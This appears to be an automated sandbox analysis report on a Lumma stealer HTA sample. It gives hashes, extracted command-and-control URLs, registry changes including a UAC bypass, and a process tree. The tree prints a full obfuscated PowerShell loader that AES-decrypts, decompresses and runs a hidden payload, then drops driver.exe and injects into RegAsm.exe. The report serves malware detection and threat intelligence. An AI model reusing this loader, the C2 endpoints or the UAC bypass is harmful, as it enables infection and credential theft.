Analysis
-
max time kernel
125s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
27-02-2024 05:12
Static task
static1
Behavioral task
behavioral1
Sample
302ec5af12ccc15b5771b3ed2b951ddc708f757c2103a1d6e71790f03902025e.hta
Resource
win7-20240220-en
General
-
Target
302ec5af12ccc15b5771b3ed2b951ddc708f757c2103a1d6e71790f03902025e.hta
-
Size
73KB
-
MD5
d5f4e13e7b8a0d81a36b2788271894b8
-
SHA1
df4b3c0c6acad446b1df50bdba61fc22313748be
-
SHA256
302ec5af12ccc15b5771b3ed2b951ddc708f757c2103a1d6e71790f03902025e
-
SHA512
bda4a2852259873eef6fda79f1e122fda3a04f8e3cf3ca611134901af555ada10d783d86ffd8723c4f75af158a64626fb78bb7cbbf5a53a8ceaf9326a5da3f81
-
SSDEEP
768:ESE2T0mcfIRTUI9XTV4jnl20LgGVO+/unhi1zOz:3E2T3cy79XTVmnI0kG8ti5Oz
Malware Config
Extracted
lumma
https://executivebrakeji.shop/api
https://technologyenterdo.shop/api
https://detectordiscusser.shop/api
https://turkeyunlikelyofw.shop/api
https://associationokeo.shop/api
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 20 1152 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
Processes:
driver.exepid process 1244 driver.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
driver.exedescription pid process target process PID 1244 set thread context of 2132 1244 driver.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe -
Modifies registry class 1 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1904519900-954640453-4250331663-1000\{C1BB2399-0D6B-468E-A0D7-59511A69917E} svchost.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 3172 powershell.exe 3172 powershell.exe 3172 powershell.exe 1152 powershell.exe 1152 powershell.exe 1152 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3172 powershell.exe Token: SeDebugPrivilege 1152 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
OpenWith.exepid process 3132 OpenWith.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
mshta.exepowershell.exepowershell.exedriver.exedescription pid process target process PID 1584 wrote to memory of 3172 1584 mshta.exe powershell.exe PID 1584 wrote to memory of 3172 1584 mshta.exe powershell.exe PID 1584 wrote to memory of 3172 1584 mshta.exe powershell.exe PID 3172 wrote to memory of 1152 3172 powershell.exe powershell.exe PID 3172 wrote to memory of 1152 3172 powershell.exe powershell.exe PID 3172 wrote to memory of 1152 3172 powershell.exe powershell.exe PID 1152 wrote to memory of 1244 1152 powershell.exe driver.exe PID 1152 wrote to memory of 1244 1152 powershell.exe driver.exe PID 1152 wrote to memory of 1244 1152 powershell.exe driver.exe PID 1244 wrote to memory of 2132 1244 driver.exe RegAsm.exe PID 1244 wrote to memory of 2132 1244 driver.exe RegAsm.exe PID 1244 wrote to memory of 2132 1244 driver.exe RegAsm.exe PID 1244 wrote to memory of 2132 1244 driver.exe RegAsm.exe PID 1244 wrote to memory of 2132 1244 driver.exe RegAsm.exe PID 1244 wrote to memory of 2132 1244 driver.exe RegAsm.exe PID 1244 wrote to memory of 2132 1244 driver.exe RegAsm.exe PID 1244 wrote to memory of 2132 1244 driver.exe RegAsm.exe PID 1244 wrote to memory of 2132 1244 driver.exe RegAsm.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\302ec5af12ccc15b5771b3ed2b951ddc708f757c2103a1d6e71790f03902025e.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $xRnrtl = 'AAAAAAAAAAAAAAAAAAAAAD0Af5kmiW2Hnx1ert6ZiHkcrCG5xRw5g+RXkvjSvgaUbk+srbVrOsQgn8toO+hu0Qw1KQj7FAk5xMoqfeLJjMEeamlWrF3FTQ6in6FDMU0esWs41x91rJ/vkrJQOkHUMM2MmLD03n+lBrw2YeIcINOqvu4GIVPjd+Fis/QpUW5Fj8iNCDQy7bTeb/cl1K0KC1ocqAlvj83iKlmuvdzxPum6cIQxLt+2YLh6fmAQocUETi+pQw294/BrcWHiPbCLQ3IVN1QFO/QcDcgmCGGhLZSmlSKvXWS4pkFTnsaeCv0q8qpFQPIbBpzGkWGBKxMJYhQh81lXHyPxeOeFyFq6jqW2vUm+uqMCwX1N5g5UHXYw3Qg4zpyOCq0I5EwoDqzACg0FQ7NLbZAuwhTLK+Yu1JUpq7a86i+FRnVjkA9yOJMjUROJtiOoDNfMdo0ej8BzSKoid4bytekfnZGfb1xfEAyrNCki102wWcJK/vZZFJJQ0EWOmR4qPclxZ3kj3QXa7iwBBn/xEMGg8xE8RDWaHfXHZqdxlpnoKmQX6CchYBPK5Q/alHBAM5gOIN5RcmnQecgz+itBcGKRKac4QUIuYCsTNOGFGvc0/93UPNG9W8OrCD+b24Y2bZP/KolyWolNdjJRHwp4RJAA9iJshbpdMe4n95z2TmNVPEVN28sDZ0kfiJCKpkbu1TkpQNSnY46SLTiZTT3ajO8Sox/hCnztghhj4DMhfQfHJBcMyZ1yynlBM+7lNgUyvioQxQ2KPY7KDi7JTpk1iQYGc+oBvO/fWUMtz9kzyEyxJpOGkwI3MMjDpUYIc9iprfEHj8hpwVdPjhcenIyhZqn28939MlitHffq24shDMzCPgjnU9OWPsMhEKvfu34pU/yjbMkwLHEjcQ==';$PWFaA = 'd0hDTktlemN0SlFHRXFla0Rjb094cnRoUGlSR050VmI=';$rtbrSxS = New-Object 'System.Security.Cryptography.AesManaged';$rtbrSxS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$rtbrSxS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$rtbrSxS.BlockSize = 128;$rtbrSxS.KeySize = 256;$rtbrSxS.Key = [System.Convert]::FromBase64String($PWFaA);$jIXAy = [System.Convert]::FromBase64String($xRnrtl);$rSpXWojt = $jIXAy[0..15];$rtbrSxS.IV = $rSpXWojt;$mXooDLjjw = $rtbrSxS.CreateDecryptor();$KHnzkbgXQ = $mXooDLjjw.TransformFinalBlock($jIXAy, 16, $jIXAy.Length - 16);$rtbrSxS.Dispose();$iIauy = New-Object System.IO.MemoryStream( , $KHnzkbgXQ );$Izyrh = New-Object System.IO.MemoryStream;$thcRRYmqg = New-Object System.IO.Compression.GzipStream $iIauy, ([IO.Compression.CompressionMode]::Decompress);$thcRRYmqg.CopyTo( $Izyrh );$thcRRYmqg.Close();$iIauy.Close();[byte[]] $QWoIKfh = $Izyrh.ToArray();$KKSHrJAF = [System.Text.Encoding]::UTF8.GetString($QWoIKfh);$KKSHrJAF | powershell -2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -3⤵
- UAC bypass
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Users\Admin\AppData\Roaming\driver.exe"C:\Users\Admin\AppData\Roaming\driver.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:2132
-
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:3132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService1⤵
- Checks processor information in registry
- Modifies registry class
PID:3316
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4048 --field-trial-handle=2972,i,4036376905309803364,5412922217215781933,262144 --variations-seed-version /prefetch:81⤵PID:2840
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
297KB
MD579ac171749690f2c947187e34d2b007d
SHA1ebe8d99c87b7b6b51af10a1260271f7282c8f8d2
SHA256cdb5f26a44a64a81c8e96db60ba2f4471f88b3980d14f91d3247a0afde34d441
SHA512c93009d5e20a8ac008e409ad677674aeacc383f0716904825847330ad12ea7347d706754f9c8724e69c0261f2edcb36a41e40f851014e51021b1bccbf7a15f54